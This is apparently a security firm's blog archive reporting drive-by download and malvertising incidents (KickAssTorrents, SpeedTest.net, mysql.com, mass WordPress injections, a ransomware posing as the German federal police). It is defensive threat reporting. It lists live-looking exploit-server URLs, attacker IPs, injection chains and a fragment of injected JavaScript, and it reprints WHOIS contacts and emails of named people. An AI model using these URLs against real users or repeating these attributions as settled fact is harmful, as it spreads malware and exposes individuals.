Armorize launched new service at RSA 2013: HackAlert Scanning and Forensics Extraction API for Malware, Malvertising, 0-day and APT Attacks

We've just completed our participation at the RSA Conference in San Francisco--our 7th year as exhibitor! We hope to give an update here of what's been happening at Armorize. It’s been 16 month since we've blogged. We've been too busy--there are many new partners and customers to support, many new threats to analyze, and many new technologies to develop--and this all makes spending time on the blog seem an unjustifiable luxury. We hope to resume blogging in a couple of months, but meanwhile, this blog post will serve as an update of what we've been working on in the past 16 months. In summary, we've been busy with:

1. Expanding our engineering and operations team, and arranging for for their advanced training and certification.
2. Developing and finalizing the HackAlert V5 API, and working on the HackAlert V6 API, which is to be released in 3Q of this year.
3. Expanding HackAlert V5 API to incorporate support for APT (advanced persistent threat) detection and AFRM- (Armorize Fornsics and Reporting Methodology) based reporting.
4. Developing and finalizing CodeSecure V5, and planning for CodeSecure V6.

Regarding 1), R&D expansion:

We've been expanding our engineering team and would like to congratulate the 35 colleagues who's recently passed their EC-Council Certified Ethical Hacker's certification: Adam Wei (ECC974360), Ain Chang (ECC974345), Alex Ruan (ECC974342), Allan Ku (ECC971799), Angus Wei (ECC974359), Aryan Chen (ECC974344), Carol Ru (ECC974341), Cyndi Wei (ECC974340), Eddie Chou (ECC974362), Eric Liu (ECC971746), Fred Tai (ECC971717), Hsuan Wang (ECC974346), Hyman Pan (ECC971733), Jasmine Chen (ECC974343), Jason Yang (ECC971702), Jeff Lee (ECC971815), Jimmy Huang (ECC974354), Joe Chang (ECC974361), Jordan Forssman, Lance Chang (ECC971730), In-Yee Lee (ECC971736), Mars Fu (ECC971756), Martin Chen (ECC971707), Matt Huang (ECC974356), Max Hsu (ECC974353), Michelle Juan (ECC974363), Paul Chen (ECC974358), Robin Huang (ECC971724), Roger Wang (ECC971813), Susan Chiu (ECC974347), Tom Kao (ECC971805), Van Cheng (ECC974357), Wayne Huang (ECC971814), and Wilson Chiou (ECC971812).

Continuous technical training is critical for us, and we've found training coupled with certification makes an effective combination. Next target will be CISSP and ECSP.

Regarding (2), the HackAlert V5 API:

The V3 API was first released in 2009 and is now both mature and robust. Based upon our experience operating the V3 service, we developed several generations of the HackAlert API, leveraging various new big data technologies. We released the HackAlert V4 API in 2010, which focused at providing our malvertising scanning platform. This time at RSA 2013, we released the HackAlert V5 API. Developed completely from the ground up around the latest methodologies for scalability, V5 is extremely scalable and fault tolerant, capable of handling a partner as big as Google. It also comes with an entirely new generation of malware and malvertising detection engines built from scratch starting in late 2011. This provides improved detection accuracy and coverage, as well as very detailed incident traceback reporting that precisely describes an incident’s origin, the areas of impact, and the final attack point. V3 and V4 servers, and consequently their API, are approaching their end of product life cycle. Starting from Nov 1st, 2012, new partners will not be offered an option to use either V3 or V4. We are working with existing partners now to help them migrate to HackAlert V5.

Regarding (3), APT and AFRM-based reports:

AFRM-based reporting is an important new feature of the HackAlert V5 API. For every scan you submit to the HackAlert service (ex: online ad, URL, malware, document exploit), you will get a detailed, aggregated forensics report, laid out according to the Armorize Forensics Reporting Methodology (AFRM). AFRM enables you to easily comprehend the returned forensics data, and to use it for your own further analysis. AFRM reports include:

1. Scene details (eg., URL, ad tag, PDF document).
2. Aggregated interpretations (eg., “malicious”, “blacklisted”).
3. Aggregated proofs (eg., “drive-by download”, “registry modification”, “process injection”). Proofs provide support for interpretations.
4. Aggregated exhibits (eg., code snippet of shellcode, code snippet of exploit code, code snippet of HTTP responses, parameters of API calls, sections of binary files). Exhibits are sections of evidences that provide support for proofs.
5. Aggregated evidences (eg., HTTP response, API calls, binary files).
6. Evidence correlations (eg., Javascript 1 (Exhibit A) --> document.write (Exhibit B) --> Javascript 2 (Exhibit C) --> Load iframe 3 (Exhibit D)).

You will know exactly what a target is made up of, what it tries to do, where the attack is coming from, and the causality relationships between the collected evidences.

Exploit-Based Malware Infections

To explain AFRM, we first take a look at the exploit-based malware infection (EBMI) process, which is a widely used attack vector in Advanced Persistent Threats (APT). In EBMI, the victim is infected via opening a malicious document, often referred to as a document exploit. Common document exploit formats used in EBMI include Web pages, PDF files, Word files, Powerpoint files, Excel files, and Flash files embedded inside one of the previous types.

Phase 1: Exploit delivery and shellcode execution

During EBMI phase 1, the victim opens a document via a (document) renderer–defined as a software program that displays the document. Common (document, renderer) pairs include: (Web page, Web browser), (Web page containing flash, Web browser with flash support or plug-in), (Web page containing Java applets, Web browser with applet support / JRE), (PDF document, PDF reader), (Word document, MS Word), (Excel document, MS Excel), (Powerpoint document, MS Powerpoint), etc.

The document here, being malicious, is referred to as a document exploit. It contains mechanisms to exploit vulnerabilities either directly inside the renderer itself, or inside one of the renderer’s installed plug-ins (eg., Flash, Java applet, Real player, etc). If the exploited vulnerability is unknown to the renderer provider (vendor), then it is called a 0-day exploit.

This exploitation code (the exploit) is often implemented using scripting languages (eg., Javascript, Actionscript, VBScript, VBA) Two key factors make scripting languages extremely useful for this purpose: a) they provide the functionality needed to exploit the targeted vulnerability and b) being interpreted languages, it is very easy to obfuscate the exploitation code, thus making detection difficult.

Common (renderer, scripting language) pairs include (Web browsers, Javascript), (Flash, Actionscript), (PDF, JScript), (Office documents, VBA macros). Note that Javascript, Actionscript, and JScript are all ECMA-based scripting languages.

The following attacks leverage an EBMI process: a) drive-by download attacks, b) malvertising attacks, c) URL-based email attacks, and d) attachment-based email attacks. In (a) (b) and (c), the browser ultimately loads a Web page served by an exploit pack, which serves polymorphic Web-page exploits. The server that hosts the exploit pack is called the exploit server, and the involved URLs are called the exploit URLs.

Phase 2: Malware execution

When a document exploit is opened and upon successful exploitation, a dropper is often created on disk and executed. The dropper can either be the actual malware, or it can be just a tiny executable whose sole job is to download the actual malware over Internet.

In order to permanently infect the compromised system, the malware will often a) move itself to permanent disk locations and b) modify system configuration (eg., registry settings) so as to be auto executed upon every system startup. In order to hide itself from security checkers and users, the malware will often a) rename itself to seemingly legitimate filenames or b) arrange for alternative, less detectable and higher-privileged methods of execution, for example, using process injection.

Once permanently installed, the malware will typically start to a) connect back home to the command-and-control (CNC) server, or to b) send the collected information back to the attacker.

Using the HackAlert V5 API, you will not only be able to detect EBMI, but also receive detailed forensics reports on exactly what had happened during the two EBMI phases.

Regarding (4), CodeSecure V5

CodeSecure V5 offers better performance, accuracy, and language support over CodeSecure V4. Last year, I manged to convince six of my university classmates and roommates to quit their excellent jobs and join Armorize. Among them, Martin Chen now oversees CodeSecure's development. He's written an entirely separate blog and we'll be putting it up very soon.

Read more (rest of article)...

Share this:blogger tutorials Social Bookmarking Blogger Widget

Malvertising on KickAssTorrents (kat.ph) , OpenX compromised to serve fake anti-virus "Security Sphere 2012"

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin)

Yesterday our HackAlert website malware monitoring service told us that KickAssTorrents (kat.ph), ranked 321 globally on Alexa with more than 1.5 million unique visitors per month, is serving malware to all of its visitors via malvertising. Below is a video showing how visitors are infected:


Coincidentally, KickAss Torrents published a blog post on Oct 10th in response to the website being flagged by antivirus vendor Avast. In it they said:
===================
Our users that are using the Avast anti-virus might have noticed that KAT.ph suddenly became labeled as a dangerous website for users that are not logged in. We want to assure our users that KickassTorrents has no malware or viruses of any kind and it is absolutely safe to use our website. We already contacted Avast and currently we are trying to find and fix the cause of this problem. You will help us if you choose the "Report the file as a false positive" option if you get the alert.
===================

In another thread, KickAss Torrents said:

===================
Now what the hell does this error mean?
First of all, don't flip out, don't go post on the KAT site, post down here if you experience the same problem.
Secondly, report down here if you experience this error.
Thirdly, add kat.ph to the safe URLs in your AV.
And lastly, please go to this site and report the problem (Avast! users only):
Avast! forum thread
Back on topic. What is this error? Does error roughly means that your anti-virus software has found some bad code in an iFrame. This could be from the site itself, or from advertisements. An iFrame is a piece of code that allows you to do several things. Embedding something to your site is a good example.
I hope this topic helps a little and I certainly hope the error is going to be fixed now.
Q&A:
Q: OMFG IS KAT HACKED?
A: Nope, just some error.
Q: Is it really safe to visit KAT?
A: Yes, it is.
===================

KickAss Torrents also referred to this discussion thread on Avast's forum. At the end of the forum it appears that Avast has acknowledged that it was indeed a false positive and have addressed the issue:

===================
Hello,

It should be solved, if not let us know please.

Miroslav Jenšík
AVAST Software a.s.
===================

Well, that time it might have been a false positive from Avast, but this time the website is absolutely infecting its visitors, as seen in our video.

[Summary]

Here we summarize characteristics worth noting:

1. High traffic website compromised.
2. Malvertising via compromising KickAssTorrents' OpenX platform.
3. Spreading fake antivirus "Security Sphere 2012" by conducting a drive-by download process. Simply navigating to the website with an outdated browsing platform will result in infection. No clicks necessary (see video).
4. Same attackers responsible for the recent speedtest.net incident.
5. Using DynDNS domains for their exploit server.
6. Domain names are auto-calculated using Javascript. The algorithm used generates a (predicable) different dyndns.tv domain name every hour, in the format of roboABCD.tv, where ABCD are characters with a fixed seed and incremented by one character every different UTC hour.
7. The new dyndns domain for the next hour is generated every hour precisely at minutes 2 to 5, so this may be done by an automated mechanism.
8. Initial antivirus detection rates are very low, from 0 to 2 vendors out of 43 on VirusTotal.
9. All generated domains resolve to a single IP: 184.22.224.154 (AS21788, United States Scranton Network Operations Center Inc), located in the US.
10. The domain: obama-president.com resolves to this IP and is serving the same exploit pack. This domain was registered on Aug 4th through an Russian registrar, 1'ST DOMAIN NAME SERVICE www.1dns.ru. At this time the domain resolved to an Netherlands IP 85.17.93.9. The domain started to resolve to 184.22.224.154 on Aug 23rd. This IP and the president-obama.com domain are both currently still up and working.

[Details]

KickAssTorrents serves its ads via its OpenX installation at ad.kat.ph. This platform has been compromised and made to serve browser exploits. In our video, this URL:

http://ad.kat.ph/delivery/ajs.php?zoneid=4&target=_blank&charset=UTF-8&cb=95920847237&charset=UTF-8&loc=http%3A//www.kat.ph/§ion=1939940

was injected with malicious javascript. In the following code snippet, the highlighted sections are the injected part. Note the code isn't just a few lines of "injection"--the code is merged with the original OpenX html code:

The following is the important parts of the decoded version:

From line 29-41, we can see that the function spelled() generates four characters based on the current hour in UTC. From line 18 we can see how this function is called: var gyrally = spelled(String("robo"), new String(".dynd" + "ns.tvmg7j".substr(0, 5)));

Antivirus detection of the dropped and installed malicious binary was 2 out of 42 vendors on VirusTotal.

And finally, here's a screenshot of the installed fake antivirus Security Sphere 2012:

Read more (rest of article)...

Share this:blogger tutorials Social Bookmarking Blogger Widget

http://jjghui.com/urchin.js mass infection ongoing

(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)
Starting Oct 9th, we've been tracing an mass injection attempt. Currently, there's been 180,000 affected pages, according to Google.

The attack targets visitors of six particular languages--English, German, French, Italian, Polish, and Breton, seen from the following deobfuscated script:

Here is a text version of the above decoded script.

The scripts causes the visiting browser to load an iframe first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu. Multiple browser-based drive-by download exploits are served depending on the visiting browser.

In a drive-by download attack, visitors who navigate to the infected websites will be installed with malware on their machines without their knowledge. This is if they have outdated browsing platforms (browser or Adobe PDF or Adobe Flash or Java etc).

This wave of mass injection incident is targeting ASP ASP.NET websites.

Currently, the 6 out of 43 antivirus vendors on VirusTotal can detect the dropped malware.

jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.

The dropped malware attempts to connect to: 65.98.83.115 (AS25653), which is in the US.

[Details]

1. ASP and ASP.NET websites are injected with the following script (text is here):

2. Contents of urchin.js is as seen below; full text is here.

3. The above script decodes to the following:

Here is a text version of the above decoded script.

4. The above script generates an iframe to www3.strongdefenseiz.in, which gives an HTTP 302 redirect to the exploit server at www2.safetosecurity.rr.nu.

Read more (rest of article)...

Share this:blogger tutorials Social Bookmarking Blogger Widget

Malvertising lifecycle case study 1--OpenX compromise on speedtest.net, spreading Security Sphere 2012 fake antivirus

(Credits: Wayne Huang, Chris Hsiao, NightCola Lin)

Incident: SpeedTest.net, ranked 541 on Alexa with 8,141,777 unique visitors and 10,177,221 page views per month, fell victim to malvertising and was spreading the "Security Sphere 2012" fake antivirus to its visitors. By simply navigating to the website, visitors with outdated browsing environments (browser or browser plugins such as Java, Adobe Flash, Adobe PDF Reader, etc) will end up with Security Sphere permanently installed inside their systems.

Malware: By claiming that every application "has been infected by malware and cannot be executed," Security Sphere 2012 basically locks down the infected computer until the victim purchases a "license" for it to "clean up the infections."

Cause: SpeedTest.net runs its own online advertisement platform using OpenX, using the domain ads.ookla.com. The attackers have compromised this OpenX platform and injected an malicious iframe into every ad served. We have a video of the how visitors are infected:


Malware Lifecycle: Initially, the detection rate on VirusTotal was 0 out of 43:

The malware detects common VMs (virtual machines) and will not execute inside a VM or sandbox. This helps it avoid detection.

Below is a timeline of the malware lifecycle. We missed to submit in some spots so the timeline isn't 100% accurate, but it gives a good idea:

2011-09-XX 00:00 UTC Initial injection into SpeedTest.net and other websites
|
|
(Anvirirus companies do not have this particular malware sample and therefore no one is detecting it)
|
(We don't know how long this period was)
|
|
2011-09-30 09:23 UTC 0 / 43, we first submitted the sample to VirusTotal. Because all 43 participating antivirus vendors are in partnership with VirusTotal, they should all have this sample once we've submitted it.

2011-09-30 11:00 UTC 2 / 43, Kaspersky, NOD32

2011-09-30 15:00 UTC 3 / 43, Dr. Web

2011-09-30 19:00 UTC 7 / 43, Comodo, Emsissoft, Microsoft, Panda

2011-09-30 23:00 UTC 9 / 43, AVG, Symantec

2011-10-01 03:00 UTC 14 / 43, BitDefender, F-Secure, GData, PCTools, SUPERAntiSpyware

2011-10-01 07:00 UTC 14 / 43,

2011-10-01 11:00 UTC 17 / 43, Avast, McAfee, VIPRE

2011-10-01 15:00 UTC 17 / 43,

2011-10-01 19:00 UTC 22 / 43, Ahn-Lab-V3, Ikarus, K7AntiVirus, McAfee-GW-Edition, Sophos

2011-10-01 23:00 UTC 22 / 43,

2011-10-02 03:00 UTC 22 / 43,

2011-10-02 07:00 UTC 22 / 43,

2011-10-02 11:00 UTC 22 / 43,

2011-10-02 15:00 UTC 22 / 43,

2011-10-02 19:00 UTC 22 / 43,

2011-10-02 23:00 UTC 22 / 43,

2011-10-03 03:00 UTC 22 / 43,

2011-10-03 07:00 UTC 22 / 43,

2011-10-03 11:00 UTC 30 / 43, AntiVir, Antiy-AVL, CAT-QuickHeal, Emsisoft, TheHacker, TrendMicro, TrendMicro-HouseCall, VirusBuster

2011-10-03 15:00 UTC 30 / 43,

2011-10-03 19:00 UTC 31 / 43, nProtect

2011-10-03 23:00 UTC 31 / 43,

2011-10-04 03:00 UTC 31 / 43,

2011-10-04 07:00 UTC 31/ 43,

2011-10-04 11:00 UTC 31 / 43,

2011-10-04 15:00 UTC 31 / 43,

2011-10-04 19:00 UTC 31 / 43,

2011-10-04 23:00 UTC 31 / 43,

2011-10-05 03:00 UTC 31 / 43,

2011-10-05 07:00 UTC 31 / 43,

2011-10-05 11:00 UTC 32 / 43, eTrust-Vet

2011-10-05 15:00 UTC 32 / 43,

2011-10-05 19:00 UTC 32 / 43,

2011-10-05 23:00 UTC 32 / 43,

2011-10-06 03:00 UTC 32 / 43,

2011-10-06 07:00 UTC 32 / 43,

2011-10-06 11:00 UTC 33 / 43, Fortinet

2011-10-06 15:00 UTC 33 / 43,

2011-10-06 19:00 UTC 33 / 43,

2011-10-06 23:00 UTC 33 / 43,

2011-10-07 03:00 UTC 33 / 43,

2011-10-07 07:00 UTC 33 / 43,

2011-10-07 11:00 UTC 33 / 43,

2011-10-07 15:00 UTC 33 / 43,

2011-10-07 19:00 UTC 33 / 43,

2011-10-07 23:00 UTC 33 / 43,

2011-10-08 03:00 UTC 33 / 43,

2011-10-08 07:00 UTC 33 / 43,

2011-10-08 11:00 UTC 33 / 43,

2011-10-08 15:00 UTC 33 / 43,

2011-10-08 19:00 UTC 33 / 43,

2011-10-08 23:00 UTC 33 / 43,

2011-10-09 03:00 UTC 33 / 43,

2011-10-09 07:00 UTC 33 / 43,

2011-10-09 11:00 UTC 33 / 43,

2011-10-09 15:00 UTC 33 / 43,

2011-10-09 19:00 UTC 34 / 43, JIangmin

2011-10-09 23:00 UTC 34 / 43,

Still undetecting: ByteHero, ClamAV, Commtouch, eSafe, F-Prot, Prevx, Rising, VBA32, ViRobot

Read more (rest of article)...

Share this:blogger tutorials Social Bookmarking Blogger Widget

Mass WordPress infection ongoing--most malicious domains using changeip.com

(credits: Wayne Huang, Chris Hsiao, NightCola Lin)
(
To peer researchers: As we all know, researching security incidents take a lot of time and sacrifice; as if they know exactly how to make our lives harder, attackers often launch right before the weekend or a long vacation. In such an event, we often need to sacrifice our personal plans to be with our families, in order to research and publish threats fast enough.

In the past, usually right after we publish our blog and tweet the link, some other security blogs will very quickly put out a post regarding the same incident. Usually there will be a link to our original post, and we appreciate this very much.

However, recently, for some of our posts, we feel our contents were plainly copied and there was no credit linking to us. We sincerely hope this won't happen.

Together as a security community, we have a common goal--to make the Internet a safer place for everyone. It's an honor to be a part of this community, and we have a lot of respect for everyone involved. We just don't like the feeling of being taken advantage of. Thanks very much everyone!
)

We've been tracking an ongoing mass WordPress infection that began to take place around Oct 5th, as detected by our HackAlert Website monitoring service. Many Wordpress sites have been hit. Using technologyadvances.net as an example, we've created a video showing how an affected WordPress site can infect its visitors.


[Summary]
1. Location of injected script: in the index page of the compromised website.
2. Means of compromise: we believe via a combination of a) stolen WordPress passwords b) backdoors into previously compromised WordPress websites and c) Automated script-injection tools that work in combination of either (a) or (b).
3. Injected script: In the [Details] section we've included an example of an injected script. There are more than 20 variations.
4. Script packer used: Dean Edwards' packer.
5. Malware: Multiple malware will be installed (dropped) onto the visitors machines without the users' knowledge. Antivirus detection rate is around 5 out of 43 vendors on VirusTotal at the time of this writing.
6. Infected websites: A lot of WordPress websites have been hit, a sample list is as follows:

http://technologyadvances.net/
http://dacwada.com/
http://gadgetgad.com/
http://atozdogbreed.com/
http://goaonwheels.com/
http://uprofitpro.com/
http://fitnorama.com/
http://wpsupportdesk.com/
http://positivelypowerful.com/
http://mybravetruehero.com/
http://heavingdeadcats.com/
http://wpsupportdesk.com/
http://pakprwire.com/
http://browndoggadgets.com/
http://ozfoodtrainer.com/
http://batangyagit.com/
http://bellamediterranean.com/
http://michaelbang.com/
http://kharlota.com/
http://prendilo.com/
http://bilgizah.com/
http://rapidshareleaks.com/
http://girlsonandroid.com/
http://keyhousemedia.com/
http://ryan-key.com/
http://theme-wordpress.com/
http://bx-design.com/
http://the396.com/
http://riverstreetsavannah.com/
http://jardin-jms.com/
http://civitanews.it/
http://capture-the-light.de/
http://spio.it/
http://smfbd.org/
http://utopianwebstrategy.com.au/
http://techmoes.com/
http://24print.lv/
http://vancsa.com/
http://hsncweb.org/
http://anyabarat.hu/
http://creativevisions.org/
http://znews24.com/
http://insidegames.ch/
http://pujckainfo.cz/
http://hdmovies.ro/
http://facilefinanza.it/
http://eflomi.de/
http://lavorareonline.org/
http://shamanicseduction.net/
http://zhutoo.com/
http://fvrc.ru/
http://amazingresorts.co.uk/
http://fotoskaufen.de/
http://vus.de/
http://pohodaveskole.net/
http://geekyfaust.info/
http://tblt.de/
http://internetbusinessuniversity.net/
http://www.paypal-deals.nl/
http://athletics.midsouthcc.edu/
http://blog.asolorep.org/
http://www.nc-council.org/
http://www.paypal-nederland.nl/
http://www.paypal-promo.nl/
http://www.paypal-deals.nl/
http://www.midsouthcc.edu/finaid/
http://www.steinway-gallery.com.sg/

7. Malicous domains: This time, instead of owning the malicious domains themselves, the attackers are using mostly the dynamic DNS service provided by changeip.com. A sample list is as follows:

http://qwqe.dnset.com/showthread.php?t=72241732
http://fadfgsa.toh.info/showthread.php?t=72241732
http://fdfsd.ftp1.biz/showthread.php?t=72241732
http://gsdgs.ftp1.biz/showthread.php?t=72241732
http://fdsfad.4dq.com/showthread.php?t=72241732
http://qwqewqr.ce.ms/showthread.php?t=72241732
http://vxzdbgvsx.ce.ms/showthread.php?t=72241732
http://vgfsgfd.ns02.us/showthread.php?t=72241732
http://fdsfgs.qpoe.com/showthread.php?t=72241732
http://fdafdas.jkub.com/showthread.php?t=72241732
http://vfsgdf.ce.ms/showthread.php?t=72241732
http://fdafad.ce.ms/showthread.php?t=72241732
http://fdafdas.ce.ms/showthread.php?t=72241732
http://fdasfad.ce.ms/showthread.php?t=72241732
http://vfsgdf.ce.ms/showthread.php?t=72241732
http://ghdhgdf.gr8name.biz/showthread.php?t=72241732
http://fadsvzx.3-a.net/showthread.php?t=72241732
http://fdhd.2waky.com/showthread.php?t=72241732
http://gsdgs.ddns.info/showthread.php?t=72241732
http://fdafad.dns04.com/showthread.php?t=72241732
http://fadfda.epac.to/showthread.php?t=72241732
http://ghdhgdf.gr8name.biz/showthread.php?t=72241732
http://fadfa.isasecret.com/showthread.php?t=72241732
http://fdafda.itemdb.com/showthread.php?t=72241732
http://fzxvz.ninth.biz/showthread.php?t=72241732
http://gsfgs.dns-stuff.com/showthread.php?t=72241732
http://fdafd.dns-dns.com/showthread.php?t=72241732
http://fdafda.dynssl.com/showthread.php?t=72291731
http://wqwwer.ce.ms/showthread.php?t=72291731
http://vandamm.345.pl/iframe.php?id=2b8325qvzjut0iv8b87u9nlxnan0kpc

8. Malicous domains: Although all of the above domains were resolving through changeip.com, there are only a few IPs used so far, including the following:

1. 95.163.66.209 (Primary IP, AS12695, Russian Federation Moscow Digital Networks Cjsc)
2. 64.131.75.19 (AS25847, United States New York Smv)
3. 182.18.185.82 (AS18229, India Hyderabad IP Pool For Znet)

9. Exploit pack: *NOT* BlackHole, still analyzing

10. Is your WordPress infected? A very simple way is to check for the existence of the following text: a) showthread b) 72241732 c) 72291731 and if these exist, have a closer look. You can also use the HackAlert Website monitoring service to have your site monitored 24x7.

[Details]

The injection has a simple chain:

1. Index page of a WordPress site is injected with script packed by Dean Edwards' packer
2. Javascript generates iframe to a malicious domain registered with changeip.com
3. Browser loads the exploit pack from the malicious domain, hosting on a few fixed IPs including 95.163.66.209 (Russia), 64.131.75.19 (USA), and 182.18.185.82 (India).

Below is an example of an injected script:

Depending on the browsing platform used, several malicious binaries are dropped upon successful exploitation. At the time of this writing, the antivirus detection rate is 5 out of 43 vendors on VirusTotal:

Read more (rest of article)...

Share this:blogger tutorials Social Bookmarking Blogger Widget

mysql.com hacked, infecting visitors with malware

(Credit: Wayne Huang, Chris Hsiao, NightCola Lin)

Our HackAlert 24x7 Website malware monitoring platform today indicated that mysql.com has been hacked and is currently serving malware. The highlighted section of the above screenshot is the injected script. Below is a video showing how visitors are infected when navigating to the site:


[Infection Chain]

Step 1: http://www.mysql.com

Causes the visiting browser to load the following:

Step 2: http://mysql.com/common/js/s_code_remote.js?ver=20091011

This is the injection point. The entire content of the above .js file can be found here.

The injected section is shown in the above screenshot. The decoded version is as follows:

The text version is available here. This script generates an iframe to Step 3.

Step 3: http://falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http://mysql.com/

Throws out a 302 redirect to Step 4.

Step 4: http://truruhfhqnviaosdpruejeslsuy.cx.cc/main.php

This domain hosts the BlackHole exploit pack. It exploits the visitor's browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, ...), and upon successful exploitation, permanently installs a piece of malware into the visitor's machine, without the visitor's knowledge. The visitor doesn't need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.

Currently, 4 out of 44 vendors on VirusTotal can detect this piece of malware.

[The Attacker]

We don't know much at this point. The following are information regarding the associated malicious domains.

falosfax.in (Step 3)
Address: 212.95.63.201
Location: Germany / Berlin
Created On:20-Jun-2011 13:17:05 UTC
Sponsoring Registrar:Transecute Solutions Pvt. Ltd. (R120-AFIN)
Registrant Name:CHRISTOPHER J KLEIN
Registrant Street1:7880 SW 132 STREET
Registrant City:MIAMI
Registrant State/Province:Florida
Registrant Postal Code:33156
Registrant Country:US
Registrant Phone:+1.3053771635
Registrant Email:cjklein54@yahoo.com
Admin ID:TS_14483505
Admin Name:CHRISTOPHER J KLEIN
Admin Organization:N/A
Admin Street1:7880 SW 132 STREET
Admin Street2:
Admin Street3:
Admin City:MIAMI
Admin State/Province:Florida
Admin Postal Code:33156
Admin Country:US
Admin Phone:+1.3053771635
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:cjklein54@yahoo.com
Tech Email:cjklein54@yahoo.com
Name Server:NS1.SKYNS1.NET
Name Server:NS2.SKYNS1.NET

truruhfhqnviaosdpruejeslsuy.cx.cc (Step 4)
Address: 46.16.233.108
Location: Sweden / Stockholm

The mysql.com website is as of now, still serving this exploit and malware.

We're in the process of contacting mysql.com. If anyone have contacts to them, please drop us an email at wayne@armorize.com

PS: Armorize is hiring presales in the bay area: http://www.linkedin.com/jobs/post?displayJobStatus=&jobId=1910971&split_page=1

Read more (rest of article)...

Share this:blogger tutorials Social Bookmarking Blogger Widget

Malvertising on Yahoo YieldManager, spreading ransomeware acting as Federal German Police (BKA)--Help solve the puzzle!

Help us solve the puzzle!
(credits: Wayne Huang, Chris Hsiao, NightCola Lin)

Over the past few days, our HackAlert scanning farm has constantly detected malvertising on Yahoo YieldManager (RightMedia). Since YieldManager is one of the world's largest ad networks, websites worldwide, big and small, have all been hit. Fortunately, the exploit server is only serving the malware to German visitors.

In our following video, we demonstrated how Ziddu was thus infected to serve this German ransomware to its visitors. According to CheckSiteTraffic.com, Ziddu enjoys 1,492,133 page views and 364,825 unique visitors per day.

The malware pretends to be a crime-detection software from the Federal German Police. It claims to have found child pornography along with other illegal content on the victim's computer. It claims that the victim's IP, OS, location, ISP, etc, have all been recorded, and locks down the computer completely, "to prevent further abuse."

A fine of 100 Euros must be paid within 24 hours to unlock the computer, or else all data will be deleted. We are in the process of informing all parties involved. This is our report.

(Above: ziddu.com hit by malvertising on Yahoo YieldManager (RightMedia)

(Above: Even Japanese sites were hit)

(Above: The installed Ransomeware--acting as Federal German Police (BKA))

Below is our video report:


Table of contents
[Summary]
[Attack Trace]
[Malvertising Analysis--The Puzzle]
[The malware]

[Summary]

Incident type: Malvertising
Incident subtype: Drive-by download, ransomware
Responsible ad network: Yahoo YieldManager (RightMedia)
Affected websites: Very large websites like ziddu.com to worldwide websites large and small. Ziddu for example has 1,492,133 page views and 364,825 unique visitors per day.
Affected visitors: German visitors only
Fake advertiser: kineticgames.info
Exploit server: BlackHole exploit pack running on town.incredibleoutcomes.com
Malicious domains:
kineticgames.info (184.172.216.234, ASN 36351, US Dallas)
sahoreen.in (184.172.216.234, ASN 36351, US Dallas)
belygaur.in (184.172.216.234, ASN 36351, US Dallas)
town.incredibleoutcomes.com (195.200.90.129, ASN 35524, Ukraine)
bundespol.net (188.229.97.2, ASN 44872, Romanina)

Associated names and emails:
einzahlung@bundespol.net
Vasiliy Pushkin, vasili006@gmail.com
Piotr Pushkin, pppiotr88@gmail.com

[Attack Trace]
Using ziddu.com as example.

Link 1: (Publisher)
Ziddu's website includes the following ad tag:

<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ad.globe7.com/st?ad_type=iframe&ad_size=728x90&section=836122"></IFRAME>

Link 2: (Ad Network) http://ad.globe7.com/st?ad_type=iframe&ad_size=728x90§ion=836122 is loaded, which contains javascript that generates an iframe to:

Link 3: (Ad Network) http://ad.globe7.com/imp?Z=728x90&s=836122&_salt=2314211323&B=10&u=http%3A%2F%2Fwww.ziddu.com%2F&r=0, which throws back an HTTP 302 redirect to:

Link 4: (Ad Network) http://ad.yieldmanager.com/imp?Z=728x90&s=836122&_salt=2314211323&B=10&u=http%3A%2F%2Fwww.ziddu.com%2F&r=0, which contains javascript that generates an iframe to:

Link 5: (Ad Network) http://ad.globe7.com/iframe3?2YA.ABrCDABgVKUAAAAAAMWJKAAAAAAAAgAEAAYAAAAAAP8AAAACBvPdGQAAAAAAIrsPAAAAAACYIzUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZlQYAAAAAAAIAAwAAAAAAASuHFtnOtz8BK4cW2c63PwErhxbZzsc.ASuHFtnOxz8zMzMzMzPTPzMzMzMzM9M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkuxJPXfCjCqRit3MeuQtEnvXOi1a6Cp0X0hsNAAAAAA==,,http%3A%2F%2Fwww.ziddu.com%2F,B%3D10%26Z%3D728x90%26_salt%3D2314211323%26r%3D0%26s%3D836122,a5451910-d1f1-11e0-906f-87d5341e0e89, which throws an HTTP 302 redirect to:

Link 6: (Ad Network) http://ad.yieldmanager.com/iframe3?2YA.ABrCDABgVKUAAAAAAMWJKAAAAAAAAgAEAAYAAAAAAP8AAAACBvPdGQAAAAAAIrsPAAAAAACYIzUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABZlQYAAAAAAAIAAwAAAAAAASuHFtnOtz8BK4cW2c63PwErhxbZzsc.ASuHFtnOxz8zMzMzMzPTPzMzMzMzM9M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkuxJPXfCjCqRit3MeuQtEnvXOi1a6Cp0X0hsNAAAAAA==,,http%3A%2F%2Fwww.ziddu.com%2F,B%3D10%26Z%3D728x90%26_salt%3D2314211323%26r%3D0%26s%3D836122,a5451910-d1f1-11e0-906f-87d5341e0e89, which contains javascript that a) displays the malicious ad, and b) generates an iframe to the exploit server. Note the iframe URL ends with .jpg in order to disguise and be less obvious.

(full copy-able text can be found on snipt here>
Link 7-a: (Fake Advertiser, Creative) http://kineticgames.info/images/728x90-1-1.gif, which is the actual malicous creative (malvertisement).

